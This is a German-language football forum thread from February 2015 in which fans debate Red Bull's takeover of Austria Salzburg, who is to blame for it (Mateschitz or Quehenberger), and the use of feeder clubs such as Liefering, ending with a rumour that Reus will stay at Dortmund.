Die RB-Fans regen sich darüber auf, denken aber nicht darüber nach woran es liegen könnte dass man so heftige Vergleiche macht. Die glauben bei ihnen ist alles super und denken nicht mal drüber nach ob was dran sein könnte. Bestes Beispiel sind ja die Fans die bis vor kurzem noch nicht daran glaubten dass Kampl usw. wirklich Salzburg verlassen. Wie naiv kann man sein?
Die Proteste bringen halt leider nichts, man kann nur hoffen dass sich solche Extrembeispiele nicht häufen, weil man jetzt gesehen hat was alles möglich ist.
Einfach schade das sich alles nur noch ums Geld dreht.
Was ist ein Extrembeispiel? RB?
Ja wenn man alles verändert. Aber das System ist überall gleich. Gibt genügend Klubs die EINEN Besitzer haben, der entscheidet.
Ja wer glaubte, dass man Kampl und Co halten wird, ist ein Träumer.
Das es aber im Fussball NUR ums Geschäft geht, ist aber auch so. Das wird sich nicht ändern. Fussballklubs sind Firmen/Unternehmen. Da gehts einzig und alleine ums Geld. Den Spielern auch. Keiner spielt wegen der Tradition oder dergleichen. Maximal geht man wieder zurück (Karriereausklingen) zu dem Verein wo man großgeworden ist.
Oder wenn man ein echter XY ist, würde man nie zum Erzrivalen gehen, aber das es bei uns auf der Welt nur um Geld geht ist leider so. Da braucht man aber nicht auf den Fussball schauen.
Wer aber nicht weiß woher das Geld bei Chelsea kommt, der interessiert sich nicht sehr dafür. Das sollte doch jeder wissen. Okay vielleicht weiß dann nicht jeder woher Abramowitsch das Geld dann her hat.
Das viele Geld aus sehr merkwüridgen Sachen bekommen haben ist aber so. Und das viele damit vielleicht nicht das beste daraus machen, ebenso.
Wie gesagt ich bin absolut kein Red Bull Befürworter. Ich trinke das nicht und ich mag es nicht was in Salzburg passiert ist. Und teilweise auch nicht was Red Bull sonst alles so finanziert. Und damit auch wieder gewisse Sachen macht. Egal.
Aber wer zahlt schafft an. Das kann ich wiederrum verstehen.
shadow08
09.02.2015, 12:31
Auf der einen Seite schreiben hier einige das ihnen Werte wichtig sind und im gleichen Atemzug treten sie ihre eigenen Werte mit dem Fuß ;-)
So viele Kommentare von anderen gabs jetzt hier nicht also kann ich mich da wohl angesprochen fühlen, vor allem weil du mir das ja schon lange einreden willst. :-P
Gleich vorweg i mag beide ned.
Im Vergleich Mateschitz vs. Abramowitsch ist mir (nur auf Fussball bezogen) Abramowitsch sympatischer weil er einfach sein Geld in den Verein steckt, aber den Verein selbst in Ruhe lässt oder hat er die Vereinsfarben geändert so wie sie ihm gefallen? Steht sein Name oder sein Produkt auf den Trikots? ;)
Abramowitsch hat halt den Fehler gemacht dass er bei den Trainern und auch Spielern mit entscheiden wollte. Sowas stört mich wenn solche eigentlich Fussball-Ahnungslosen mitreden wollen. Mir ist schon klar dass man auch mit entscheiden will wenn man schon so viel Geld investiert, aber man kanns auch übertreiben.
So viel zu dem Vergleich.
Zum CL-Finale gings den meisten wohl nur welcher der beiden Vereine das schlimmere Übel wäre. :)
Bei den Bayern gehts bei vielen ned ums Geld sondern um die Arroganz und die ungute Art von früher. Daher sind sie halt immer noch ein Feindbild und bleibens wohl auch irgendwie immer.
Ich muss sagen ich hab die Bayern früher auch mehr gehasst, mittlerweile hat sich einiges geändert und vor allem vor der Finanziellen Leistung habe ich Respekt.
Mateschitz macht in vielen Bereichen einiges richtig, aber im Fussball macht er vieles falsch und ich wünsche ihm nichts sehnlicher als ein Scheitern. Mit Salzburg noch nie in die CL geschafft und mit Leipzig hoffentlich auch nie.
Bei den Bayern gehts mir genauso. Früher war es wesentlich schlimmer. Da war schon viel so "mia san mia" noch viel heftiger. In einer gewissen Weise ja auch gut so, da man sich selbst treu bleiben soll, aber das "herablassende" war da schon damals viel stärker.
Früher hätte ich auch viel leichter automatisch zu "jedem nur nicht die Bayern" gehalten. ;-) Und diese Einstellung haben noch viele Österreicher. Obwohl ja Bayern ja quasi doch eher zu Österreich gehört als zu Deutschland. ;-)
Mateschitz macht im Fussball aber mehr richtig als ein Stronach bei der Austria gemacht hat. Das aber Mateschitz dies ändert war klar. Wie gesagt ich sehe hier den Verräter ganz anders. Man hätte niemals den Klub an Mateschitz verkaufen sollen. (wenn einem an der echten Austria als Salzburg was liegt) Warum dies die wenigsten anprangern versteh ich einfach nicht.
Das Mateschitz das draus machen lässt, ist aber sowas von klar gewesen. Ausser man ist eben so naiv wie diejenigen die glauben dass Kampl und Co immer bei Salzburg bleiben würden.
shadow08
09.02.2015, 12:43
Was ist ein Extrembeispiel? RB?
Ja wenn man alles verändert. Aber das System ist überall gleich. Gibt genügend Klubs die EINEN Besitzer haben, der entscheidet.
Jop davon gibts mehrere und ich weiß meine Meinung ist da nur ein Wunschdenken, aber die sollten sich mehr im Hintergrund halten und die Entscheidungen denen überlassen die wirklich damit zu tun haben.
Mit Extrembeispiel meine ich das Ganze was sie sich da mit ihren Vereinen aufgezogen haben. Linzentausch damit man Aufstiegsregeln umgehen kann. Spieler hin und her schieben.
Mateschitz macht im Fussball aber mehr richtig als ein Stronach bei der Austria gemacht hat. Das aber Mateschitz dies ändert war klar. Wie gesagt ich sehe hier den Verräter ganz anders. Man hätte niemals den Klub an Mateschitz verkaufen sollen. (wenn einem an der echten Austria als Salzburg was liegt) Warum dies die wenigsten anprangern versteh ich einfach nicht.
Das Mateschitz das draus machen lässt, ist aber sowas von klar gewesen. Ausser man ist eben so naiv wie diejenigen die glauben dass Kampl und Co immer bei Salzburg bleiben würden.
Jop davon gibts mehrere und ich weiß meine Meinung ist da nur ein Wunschdenken, aber die sollten sich mehr im Hintergrund halten und die Entscheidungen denen überlassen die wirklich damit zu tun haben.
Mit Extrembeispiel meine ich das Ganze was sie sich da mit ihren Vereinen aufgezogen haben. Linzentausch damit man Aufstiegsregeln umgehen kann. Spieler hin und her schieben.
was mir auffällt auf das Rot markierte geht da Alex ned drauf ein ;-)
da Joker hat das jetzt scho 4-5 mal geschrieben ;-)
jetzt mal direkt Alex was sagst dazu?
Wie gesagt ich bin da total bei dir. In österreich mit Pasching, Liefering und Salzburg ist das eine Verarsche.
Austria musste seine Amateure absteigen lassen, da man dies nicht wollte. Salzburg umgeht das mit einem 2. Klub der aber irgendwie genehmigt wird. Aber nur soweit, dass Liefering selbst kein Stimmrecht hat, weils ja zu Salzburg gehört. Oida gehts noch. Dann muss man sowas unterbinden. Aber man tut es nicht.
Schade schade.
Wenn man es so macht wie (ich nehme es mal her, da dieser Verein schon mal genannt wurde) Chelsea mit vielen vielen Leihspielern, dann ist das durchaus okay. Wenns dann aber soweit kommt, dass eben Courtois (bei Atletico) nicht gegen Chelsea auflaufen darf, dann würde auch da was falsch rennen. Und ist nicht ideal gelöst.
Die meisten Personen an der Macht, wollen aber mitreden. Weil sie eben an der Macht sind. Man merkt es halt noch so oft. Wie oft hört man aber dass Mateschitz wirklich was "vorgibt". Ich persönlich denke es ist nicht öfter als bei den anderen. Kommt vielleicht anders vor, weil man es hier mehr verfolgt.
shadow08
09.02.2015, 13:02
Bei den Bayern gehts mir genauso. Früher war es wesentlich schlimmer. Da war schon viel so "mia san mia" noch viel heftiger. In einer gewissen Weise ja auch gut so, da man sich selbst treu bleiben soll, aber das "herablassende" war da schon damals viel stärker.
Früher hätte ich auch viel leichter automatisch zu "jedem nur nicht die Bayern" gehalten. ;-) Und diese Einstellung haben noch viele Österreicher. Obwohl ja Bayern ja quasi doch eher zu Österreich gehört als zu Deutschland. ;-)
Stronach hat vieles im Abramowitsch-Style falsch gemacht, aber immerhin waren sie auch im Uefa-Cup mal gut dabei, mehr haben die Salzburger seit Mateschitz auch noch ned geschafft. :lol:
Zum Quehenberger, da hast natürlich Recht den trifft die schuld genauso.
Einerseits weiß ich jetzt leider nicht ob es damals bekannt war, ob er selbst genau bescheid wusste was aus dem Verein werden wird. Problem ist halt auch, selbst wenn er es gewusst hätte, er hätte wohl trotzdem verkauft weils ihm um sich ging und ned um den Verein. Er wäre nicht den Weg ganz hinunter und einen Neuaufbau mitgegangen.
Dafür spricht auch seine Aussage dass er zu RB steht und sich von Austria Salzburg distanziert. Der ist für mich genauso unten durch.
@Mane als hätt ich mich schon mal um eine Antwort gedrückt, vergleich mal welchen Post ich zitiert habe und wann Joker den Post zum Quehenberger gemacht hat, ich kann auch nur einen nach dem anderen abarbeiten :-P
Stronach hat vieles im Abramowitsch-Style falsch gemacht, aber immerhin waren sie auch im Uefa-Cup mal gut dabei, mehr haben die Salzburger seit Mateschitz auch noch ned geschafft. :lol:
Zum Quehenberger, da hast natürlich Recht den trifft die schuld genauso.
Einerseits weiß ich jetzt leider nicht ob es damals bekannt war, ob er selbst genau bescheid wusste was aus dem Verein werden wird. Problem ist halt auch, selbst wenn er es gewusst hätte, er hätte wohl trotzdem verkauft weils ihm um sich ging und ned um den Verein. Er wäre nicht den Weg ganz hinunter und einen Neuaufbau mitgegangen.
Dafür spricht auch seine Aussage dass er zu RB steht und sich von Austria Salzburg distanziert. Der ist für mich genauso unten durch.
@Mane als hätt ich mich schon mal um eine Antwort gedrückt, vergleich mal welchen Post ich zitiert habe und wann Joker den Post zum Quehenberger gemacht hat, ich kann auch nur einen nach dem anderen abarbeiten :-P
das hast aber bisher nie Kundgetan das der Quehenberger auch unten durch ist ;-)
bisher konnte man nur raus lesen das Red Bull und Herr M. schuld sind 8-)
Klar gings um ihn. Er hat den Verein verkauft. Er hätte ja auch nicht mit runter müssen, aber den Verein verkaufen.
Sorry dass Mateschitz das draus macht, ist aber sowas von klar gewesen. Was denn sonst? Mateschitz benutzt ALLES für Marketing. Insofern ists auch klar, dass er den Verein so hinbiegt, dass es Marketing ist. Da brauchst doch nur über den Werdegang drüberlesen, fällt dies auf.
Wie gesagt wer das nicht sehen wollte, ist so blind wie diejenigen die glauben Kampl würde ewig für RB spielen.
So läuft es einfach nicht.
Quehenberger hat damals alles verkauft und verraten. Er ist der Untergang von Austria Salzburg. Ja klar wäre der Verein in Konkurs gegangen. Und hätte sich neu aufstellen müssen wie der GAK. Wer weiß was dann passiert ist.
oder wie es die Rangers (Glasgow) gemacht haben. Dazu brauchst halt Leute die den Verein lieben und nicht die auf sich schauen.
Der Rest ist leider Geschichte. Für mich war es aber klar und abzusehen, dass dort alles verschwinden wird. Ich kann dies ebenso nicht gut heissen und verabscheue so ein auftreten. Aber dieser "Protest" ist Mateschitz einfach zu klein und darüber sieht er hinweg. Er hätte auch vor 0 Zuschauern gespielt. Würde egal sein und er hätte das durchgezogen. Das dann gewisse zurückkommen bzw. neue Fans kommen war ebenso abzusehen.
Tradition ist in dieser Branche sowas von überbewertet.
Stronach war damals genauso "Betriebsführer" wie Mateschitz. Allerdings befristet eben. Und er hat es nicht geschafft dass er das so umdreht wie gewünscht. Magna hatte man dennoch auf der Brust als Sponsor quasi. ABER der hat sich vieles einreden lassen. Wie war das noch, dass er Österreich zur WM führen wird und so weiter. Der hatte NUR einflüsterer, die keine Ahnung hatten. Hat Tennispartner in den Verein geholt, die keine Ahnung von Fussball hatten. Hat Leuten vertraut die ihn ausnutze wollten.
Stimmt schon ich war damals auch mit der Austria unterwegs und bei diesen Sensationellen Lauf international dabei in Bilbao und Saragossa. Leider nicht dabei als man gegen Parma ausgeschieden ist. Das waren schon sehr tolle Spiele. Nur Stronach hat auch vieles schlecht gemacht. Und nur halbherzig. Gut weil er selbst auch keine Ahnung von Fussball hat (bzw. hatte)
shadow08
09.02.2015, 13:33
das hast aber bisher nie Kundgetan das der Quehenberger auch unten durch ist ;-)
bisher konnte man nur raus lesen das Red Bull und Herr M. schuld sind 8-)
Was genau ändert sich dadurch?
Soll ich jetzt RB doch toll finden weil die alles richtig machen und eigentlich ist nur Quehenberger schuld?
JA Quehenberger hat alles verraten, wie es Joker schon schön zusammengefasst hat, entweder war er naiv oder es war ihm egal.
Trotzdem ist für alles was geschehen ist RB selbst verantwortlich.
Denn da gibts einen Punkt den sehe ich nicht ganz wie Joker, damals war nicht gleich abzusehen dass es so laufen wird. Habs eh schon mal erwähnt das RB-Blau ist einem Violett schon ähnlich also man hätte hier nicht so drastisch alles zu seinem Eigen machen müssen.
Natürlich ist da auch nicht zwingend Mateschitz schuld denn vielleicht wollte er es auch nicht so haben und seine Management und seine Berater hielten es so für besser, kann alles sein, aber ER wäre derjenige gewesen der sagen hätte können NEIN wir löschen diesen Traditionsverein nicht aus, aber der Verein selbst ist egal gewesen es ging nur um die Lizenz für ein Team ganz oben und somit ist er einfach der Sündenbock.
Was genau ändert sich dadurch?
Soll ich jetzt RB doch toll finden weil die alles richtig machen und eigentlich ist nur Quehenberger schuld?
JA Quehenberger hat alles verraten, wie es Joker schon schön zusammengefasst hat, entweder war er naiv oder es war ihm egal.
Trotzdem ist für alles was geschehen ist RB selbst verantwortlich.
Denn da gibts einen Punkt den sehe ich nicht ganz wie Joker, damals war nicht gleich abzusehen dass es so laufen wird. Habs eh schon mal erwähnt das RB-Blau ist einem Violett schon ähnlich also man hätte hier nicht so drastisch alles zu seinem Eigen machen müssen.
Natürlich ist da auch nicht zwingend Mateschitz schuld denn vielleicht wollte er es auch nicht so haben und seine Management und seine Berater hielten es so für besser, kann alles sein, aber ER wäre derjenige gewesen der sagen hätte können NEIN wir löschen diesen Traditionsverein nicht aus, aber der Verein selbst ist egal gewesen es ging nur um die Lizenz für ein Team ganz oben und somit ist er einfach der Sündenbock.
das sehe ich jetzt schon ein bisschen anders als Du ;-)
2004 hat Red Bull das F1 Team von Jaguar gekauft.
unter Jaguar war die Farbe vom Boliden Grün
unter Red Bull dann RB Blau ;-)
2005 dann die Übernahme von der Austria ;-)
nein da konnte man nicht damit rechnen das hier eine neu Farbe
kommt :shock:
das ist ned dein ernst ?
in meinen Augen ist da das übel der Herr Q.
hätte er nicht verkauft dann wäre die Austria immer noch die alte Austria mit Tradition egal wo sie jetzt spielen würden ;-)
Und selbst wenn.
Stell dir vor statt dem dunklen Blau wäre Violett. Der Rest aber so wie es jetzt ist, wäre das für dich okay gewesen. Ich hoffe wohl nicht.
Weil wie du sagst, sind die beiden Farben ja eh ähnlich. Also dann ist das dunkle Blau wohl auch nicht ganz so schlimm wenns eh fast gleich ist oder wie?
DAS ist aber nicht der einzige Punkt der hier sch.... gemacht wurde.
Das aber das Logo von RB bald so erscheinen wird bei Salzburg ist wohl hoffentlich jedem klar gewesen.
Quehenberger war Austria Salzburg lange am Herzen. Er selbst wollte aber dann nicht darstehen als derjenige der den Verein mitruiniert hat. (der Konkurs der anstand ist unter ihm entstanden) Daher hat er einen super Weg gefunden (so findet er) dass man es einfach RB übergibt. Alle sind glücklich. Und er ist aus dem Schneider. Ich kenne viele die Quehenberger quasi noch anbeten und nur Mateschitz die Schuld geben. Augen auf, machen die meisten hier anscheinend nicht.
(das bitte nicht auf dich, shadow, beziehen)
shadow08
09.02.2015, 14:42
das sehe ich jetzt schon ein bisschen anders als Du ;-)
2004 hat Red Bull das F1 Team von Jaguar gekauft.
unter Jaguar war die Farbe vom Boliden Grün
unter Red Bull dann RB Blau ;-)
2005 dann die Übernahme von der Austria ;-)
nein da konnte man nicht damit rechnen das hier eine neu Farbe
kommt :shock:
das ist ned dein ernst ?
in meinen Augen ist da das übel der Herr Q.
hätte er nicht verkauft dann wäre die Austria immer noch die alte Austria mit Tradition egal wo sie jetzt spielen würden ;-)
Also ein Vergleich mit der F1 hinkt meiner Meinung nach komplett.
Dort sind die Rennwagen doch immer an den Hauptsponsor angepasst da ist es ziemlich klar und ich kann mir vorstellen dass es dort in den meisten Fällen den Fans ohnehin egal ist. Selbst wenn Ferrari jetzt in Gelb erscheinen würde, gäbe es wahrscheinlich keinen Aufstand.
Der RB Einstieg in der F1 war mir noch dazu ziemlich egal also damit hab ich mich nicht beschäftigt. Dort wäre es aber wirklich logisch geweisen weil ein RB-Logo auf grün hätte ned mal gut ausgeschaut.
Rechnen konnte man damit und man hats ja auch gleich gesehen, trotzdem hätte ich mir damals erhofft, dass man einen Kompromiss eingeht. War aber zu viel erwartet. Wir hatten damals auch schon Trikots mit hauptsächlich weiß und die Ärmel oder sonstiges in violett, da hätte ein RB-Logo auf der Brust genügt so wie es alle anderen Sponsoren auch machen.
Quehenberger war sicher der Auslöser, aber er hat wohl nicht gesagt 'da habts nehmts euch den Verein und machts damit was ihr wollt, scheissts auf die Fans und ändert alles nach belieben' RB hat selbst entschieden was sie daraus machen, man hat sich gegen einen gemeinsamen Weg entschieden und somit einen Verein zerstört und sich selbst etwas neues aufgebaut mit dem Vorteil auch noch gleich ganz oben zu starten.
Somit wird nichts meinen Hass schmälern können. ;)
@Joker die Farbe war natürlich der erste Hauptgrund, was danach alles passierte damit kann ich mich einfach nicht identifizieren und selbst wenn sie jetzt wieder zu violett wechseln es würde nichts ändern.
Selbst wenn RB jetzt eine Fusion mit meiner Austria Salzburg vorschlagen würde und die Verantwortlichen bei uns zustimmen würden (was zum Glück nie geschehen wird) dann wäre ich Vereinslos!
Das mit dem Logo war mir damals klar und das war mir schon immer ein Dorn im Auge dass bei uns in Ö immer der Sponsor mit hinein muss und unseres damals schon oft geändert wurde.
Hmmm. Ich glaube nicht dass es einem Ferrari Fan wurscht ist welche Farbe. Aber egal.
Klar hat Quehenberger dies nicht gesagt, aber er hätte es eigentlich kommen sehen können.
Wenn ich aber irgendwas verkaufe, darf ich mich nachträglich nicht beschweren, wenn wer anderer was daraus macht.
Wenn ich mein Auto an einen Schrotthändler verkaufe, muss ich doch wissen was der draus macht.
Wenn ich einen Verein an Mateschitz verkaufe, kannst davon ausgehen was er draus macht.
Insofern würde Quehenberger sich noch was aus dem Verein machen, würde er ihn nicht hergeben. So wäre die Entscheidung damals gelaufen. ER wollte aber nicht mehr und wollte das alles irgendwie los werden. Er wollte aber nicht Schuld sein, wenn der Verein in der 4. Liga nochmals beginnen muss. Insofern hat er diesen Weg gewählt. Quehenberger ist LANGE Zeit etwas an Austria Salzburg gelegen. Hat auch einiges selbst reingesteckt, aber er hat es sich dann zu einfach gemacht.
MIR ist es auch total egal ob du RB hasst oder nicht. Ich will deinen Hass sicher nicht schmälern. Es ist mir ja eh total egal.
Also ein Vergleich mit der F1 hinkt meiner Meinung nach komplett.
Dort sind die Rennwagen doch immer an den Hauptsponsor angepasst da ist es ziemlich klar und ich kann mir vorstellen dass es dort in den meisten Fällen den Fans ohnehin egal ist. Selbst wenn Ferrari jetzt in Gelb erscheinen würde, gäbe es wahrscheinlich keinen Aufstand.
Der RB Einstieg in der F1 war mir noch dazu ziemlich egal also damit hab ich mich nicht beschäftigt. Dort wäre es aber wirklich logisch geweisen weil ein RB-Logo auf grün hätte ned mal gut ausgeschaut.
Rechnen konnte man damit und man hats ja auch gleich gesehen, trotzdem hätte ich mir damals erhofft, dass man einen Kompromiss eingeht. War aber zu viel erwartet. Wir hatten damals auch schon Trikots mit hauptsächlich weiß und die Ärmel oder sonstiges in violett, da hätte ein RB-Logo auf der Brust genügt so wie es alle anderen Sponsoren auch machen.
Quehenberger war sicher der Auslöser, aber er hat wohl nicht gesagt 'da habts nehmts euch den Verein und machts damit was ihr wollt, scheissts auf die Fans und ändert alles nach belieben' RB hat selbst entschieden was sie daraus machen, man hat sich gegen einen gemeinsamen Weg entschieden und somit einen Verein zerstört und sich selbst etwas neues aufgebaut mit dem Vorteil auch noch gleich ganz oben zu starten.
Somit wird nichts meinen Hass schmälern können. ;)
@Joker die Farbe war natürlich der erste Hauptgrund, was danach alles passierte damit kann ich mich einfach nicht identifizieren und selbst wenn sie jetzt wieder zu violett wechseln es würde nichts ändern.
Selbst wenn RB jetzt eine Fusion mit meiner Austria Salzburg vorschlagen würde und die Verantwortlichen bei uns zustimmen würden (was zum Glück nie geschehen wird) dann wäre ich Vereinslos!
Das mit dem Logo war mir damals klar und das war mir schon immer ein Dorn im Auge dass bei uns in Ö immer der Sponsor mit hinein muss und unseres damals schon oft geändert wurde.
glaub mir Ferrari wird immer in Rot fahren ;-) da würde es mit Sicherheit Aufstände geben ;-)
zum anderen da jetzt eh schon viel geschrieben worden ist lasse ich es so wie es ist ;-)
Nur noch eine Meinung von mir dazu der Herr Q. kommt bei Dir viel zu gut weg :-?
ist aber nur meine Meinung!
Ich Respektiere Deine Meinung und gut is :prost:
:yo:
eine Frage hab ich noch Alex :-?
gab es damals keine Mitgliederversammlung die Abstimmen mussten ob verkauft wird oder nicht?
sollte ja bei einem Verein so sein oder ? wenn ja dann muss es da ja auch eine Mehrheit geben :noidea:
shadow08
09.02.2015, 15:03
Noch etwas zur F1 da ging es schon immer nur ums große Geld, wer zu wenig hat braucht ned antreten.
Im Fussball hat man bisher immer gesagt, Geld allein spielt kein Fussball.
Mittlerweile bei manchen Vereinen schon, aber auch nur weil man doch auch darauf schaut welche teuren Spieler man holt und weil auch bessere Trainer und im Hintergrund die richtigen Köpfe geholt werden.
Bei euch in D machts RB eigentlich fast richtig, mit nur EINEM Verein und den hat man von unten geholt.
Euch würde es auch mehr stören wenn mal Leipzig in der 1. BuLi spielt und dann noch ein 2. RB Team in der 2. BuLi spielen würde, denn bei euch dürfen ja Bayern II oder sonstige 2. Teams auch ned weiter rauf, oder?
die 2. Mannschaften dürfen höchstens 3. Liga spielen in D
shadow08
09.02.2015, 15:11
eine Frage hab ich noch Alex :-?
gab es damals keine Mitgliederversammlung die Abstimmen mussten ob verkauft wird oder nicht?
sollte ja bei einem Verein so sein oder ? wenn ja dann muss es da ja auch eine Mehrheit geben :noidea:
Ich war damals kein Mitglied also keine Ahnung wie das damals genau abgelaufen ist.
Ehrlich gesagt weiß ich nicht mal mehr was im Vorfeld darüber bekannt wurde, ob klar war dass sich alles ändern wird oder ob die Hoffnung bestand, dass dem M. doch auch was an dem Verein liegt und er sein Amt wie ein Sponsor ausführt.
Und zu dem das Quehenberger bei mir zu gut davon kommt, naja was soll ich machen soll ich jedesmal wenn ich über RB fluche, ihn auch erwähnen?
Die jungen Bubis die sich RB-Fans nennen kennen ihn wahrscheinlich ned mal. :)
Soll ich das Aue-Transparent nochmal neu machen und den Quehenberger ergänzen? :lol::lol::lol:
shadow08
09.02.2015, 15:13
die 2. Mannschaften dürfen höchstens 3. Liga spielen in D
Siehst so ists bei uns auch, aber RB hat sich ein Hintertürl gesucht um ihre 2. Mannschaft in die 2. Liga zu bringen.
Ich war damals kein Mitglied also keine Ahnung wie das damals genau abgelaufen ist.
Ehrlich gesagt weiß ich nicht mal mehr was im Vorfeld darüber bekannt wurde, ob klar war dass sich alles ändern wird oder ob die Hoffnung bestand, dass dem M. doch auch was an dem Verein liegt und er sein Amt wie ein Sponsor ausführt.
Und zu dem das Quehenberger bei mir zu gut davon kommt, naja was soll ich machen soll ich jedesmal wenn ich über RB fluche, ihn auch erwähnen?
Die jungen Bubis die sich RB-Fans nennen kennen ihn wahrscheinlich ned mal. :)
Soll ich das Aue-Transparent nochmal neu machen und den Quehenberger ergänzen? :lol::lol::lol:
Ok schade hätte mich Interessiert.
Ja :-D
nein :-?
Danke für die schöne Nachmittagsunterhaltung ohne das man Provoziert wird!
shadow08
09.02.2015, 15:21
Ok schade hätte mich Interessiert.
Ja :-D
nein :-?
Danke für die schöne Nachmittagsunterhaltung ohne das man Provoziert wird!
Wenn ich dran denk schreib ich ab jetzt für dich Scheiß RBQ :lol:
Siehst so ists bei uns auch, aber RB hat sich ein Hintertürl gesucht um ihre 2. Mannschaft in die 2. Liga zu bringen.
Jap genau. Offiziell ist es nicht erlaubt aber man hat einen Weg gefunden und damit verarscht man schon die anderen. In Österreich ist es kein Problem anscheinend.
Man hat hier 2 Vereine die EINDEUTIG zu RB gehören. Und zwar voll und ganz. Sieht man doch an vielen Sachen.
Nur die österreichische Liga oder der ÖFB will nichts dagegen tun. Da hätte man anders reagieren müssen.
oleander
09.02.2015, 16:44
Jap genau. Offiziell ist es nicht erlaubt aber man hat einen Weg gefunden und damit verarscht man schon die anderen. In Österreich ist es kein Problem anscheinend.
Man hat hier 2 Vereine die EINDEUTIG zu RB gehören. Und zwar voll und ganz. Sieht man doch an vielen Sachen.
Nur die österreichische Liga oder der ÖFB will nichts dagegen tun. Da hätte man anders reagieren müssen.
Auf das rein Sportliche reduziert, ist es halt so, dass Liefering (oder wie man die zweite Mannschaft von RB in Österreich halt nennen möchte) eigentlich die Qualität für die Bundesliga hätte. Weil wiederum ein ordentliches Budget da ist, gute junge Spieler geholt und auch die eigenen Nachwuchsspieler mit tollen Möglichkeiten gefördert werden.
Die Regionalliga wäre für dieses Team, so nüchtern muss man das sagen, sportlich wertlos.
Bin, wie viele andere auch, schon seit Jahren der Meinung, dass das österreichischen Ligensystem reformiert gehört. Da könnte man sich dann auch etwas für die "Problematik" Salzburg-Pasching-Liefering einfallen lassen.
Die beste Lösung für den österreichischen Fußball wäre freilich, wenn Red Bull (unparteiisch) die gesamte Liga großzügig sponsort, dann hätten alle etwas davon. Zusätzlich könnten sie auch gezielt in den "Breitensport Fußball" im Amateurbereich investieren.
Man muss schon neidlos anerkennen, dass Red Bull als Konzern etwas bewegt: Das ist unserer heutigen Zeit nicht selbstverständlich und sollte schon respektiert und anerkannt werden.
Stiffler
09.02.2015, 16:52
Sehr schöner Meinungsaustausch auf nettem Niveau, schön dass alle Teilnehmer mithalten konnten :up:
oleanders vorhergehendes Posting kann ich dabei Kompromißlos unterschreiben :yo:
shadow08
09.02.2015, 17:00
Auf das rein Sportliche reduziert, ist es halt so, dass Liefering (oder wie man die zweite Mannschaft von RB in Österreich halt nennen möchte) eigentlich die Qualität für die Bundesliga hätte. Weil wiederum ein ordentliches Budget da ist, gute junge Spieler geholt und auch die eigenen Nachwuchsspieler mit tollen Möglichkeiten gefördert werden.
Genau da ist es ja den anderen Vereinen gegenüber unfair, denn bei RB kann man sich so viele junge Talente holen wie man will weil man genug Platz hat um sie einzusetzen und auf die vielen Teams aufteilen kann. Hätten sie nicht alle verarscht hätten sie sich erst gar nicht so viele Talente holen können.
Die Regionalliga wäre für dieses Team, so nüchtern muss man das sagen, sportlich wertlos.
Bin, wie viele andere auch, schon seit Jahren der Meinung, dass das österreichischen Ligensystem reformiert gehört. Da könnte man sich dann auch etwas für die "Problematik" Salzburg-Pasching-Liefering einfallen lassen.
Die beste Lösung für den österreichischen Fußball wäre freilich, wenn Red Bull (unparteiisch) die gesamte Liga großzügig sponsort, dann hätten alle etwas davon. Zusätzlich könnten sie auch gezielt in den "Breitensport Fußball" im Amateurbereich investieren.
Man muss schon neidlos anerkennen, dass Red Bull als Konzern etwas bewegt: Das ist unserer heutigen Zeit nicht selbstverständlich und sollte schon respektiert und anerkannt werden.
Respekt und Anerkennung? Sicher nicht im Fussball!!!
Naja sportlich gesehen haben es die Austria Amateure auch dorthin geschafft und sich in der Klasse gehalten.
Warum müssen die Absteigen und die anderen dürfen oben bleiben nur weil es dort "Liefering" ist?
Würde Austria Amateure auch damals nicht Austria Amateure heissen sondern Wien 10, dann wäre es okay gewesen?
SPORTLICH gesehen war dies ein Zwangsabstieg damals.
Natürlich hat man dann dort alles zurückgeschraubt. Man setzt jetzt bei den Amas genauso 17-20 Jährigen ein. Und würde dennoch um den Aufstieg mitspielen. (in der Regionalliga)
im letzten Jahr wo man wusste man wird absteigen müssen, ist man dann auch letzter geworden, aber eben nur weil es eh schon egal war. Davor hat man sogar schon mal den 4. Platz in der 2. Liga gehabt. Insofern auch da wäre das Potenzial da gewesen. Aber man DURFTE nicht.
Daher finde ich es SCH.... wenn dies andere Mannschaften sehrwohl übergehen. Wurscht ob sich die Qualität dazu haben oder nicht. Andere dürfen das nicht. Das sit ein entscheidender Punkt.
Ja ein LIGASPONSOR Red Bull wäre auch nicht schlecht. Wirds aber nicht geben. Warum? Weil dieser fast nur in Österreich vorkommt. Und hier der Werbewert zu klein ist.
Grundsätzlich um die Liga zu stärken hätte das aber was.
Red Bull bewegt viel. Kein Thema. Und neidisch bin ich sicher nicht. Seh keinen Grund dazu. Dennoch hat Red Bull einfach Hintergedanken dazu. Was auch wieder absolut verständlich ist. Würde ich genauso als Unternehmen haben Nonane.
Stiffler
09.02.2015, 17:04
Respekt und Anerkennung? Sicher nicht im Fussball!!!
Und warum nicht?
Wird doch dem Chelsea FC, Paris, ManU, Arsenal, Juve, Madrid, Donezk auch entgegen gebracht.
An diesem Modell ist mMn nicht alles so extrem verwerflich wie du es siehst. Allerdings habe ich in die Machenschaften Liefering und was ihr noch genannt habt keinen Einblick.
shadow08
09.02.2015, 17:11
Und warum nicht?
Wird doch dem Chelsea FC, Paris, ManU, Arsenal, Juve, Madrid, Donezk auch entgegen gebracht.
An diesem Modell ist mMn nicht alles so extrem verwerflich wie du es siehst. Allerdings habe ich in die Machenschaften Liefering und was ihr noch genannt habt keinen Einblick.
Genau darum gehts mir aber.
Millionen investieren und Stars holen wäre so wie bei Chelsea usw.
Mich stört aber genau das Andere. Ein Verein wurde ausgelöscht fürs eigene Projekt (stand selbst auf deren Homepage damals dass sie ein komplett neuer Verein sind und sich von Austria Salzburg distanzieren), später wollten sie sich dann doch die Austria Salzburg Titel unter den Erfolgen reinschreiben. Regeln umgehen und lauter so Aktionen, dafür kann es keinen Respekt geben.
Was will man denn sagen 'Hey ihr seids super ihr habts eine minimale Lücke in den Regeln gefunden und die beinhart ausgenutzt und allen auf den Kopf geschissen und euch dadurch enorme Vorteile geholt, weiter so' ? echt jetz?
Man muss RB ned hassen, da bin ich halt extrem beeinflusst, aber alles schön reden was sie machen braucht man auch ned.
Reus bleibt in Dortmund?????
Angeblich soll die Unterschrift noch im Februar sein.
Find ich interessant.
Reus bleibt in Dortmund?????
Angeblich soll die Unterschrift noch im Februar sein.
Find ich interessant.
Hab ich gerade auf Transermarkt.de (http://www.transfermarkt.de/bericht-reus-mit-tendenz-zur-vertragsverlangerung-beim-bvb/view/news/187909) gelesen, aber solange die Tinte ned trocken bzw. was auf BVB Homepage steht glaube ich´s ned...
Stiffler
09.02.2015, 18:41
Das wäre in der Tat ein Hammer!
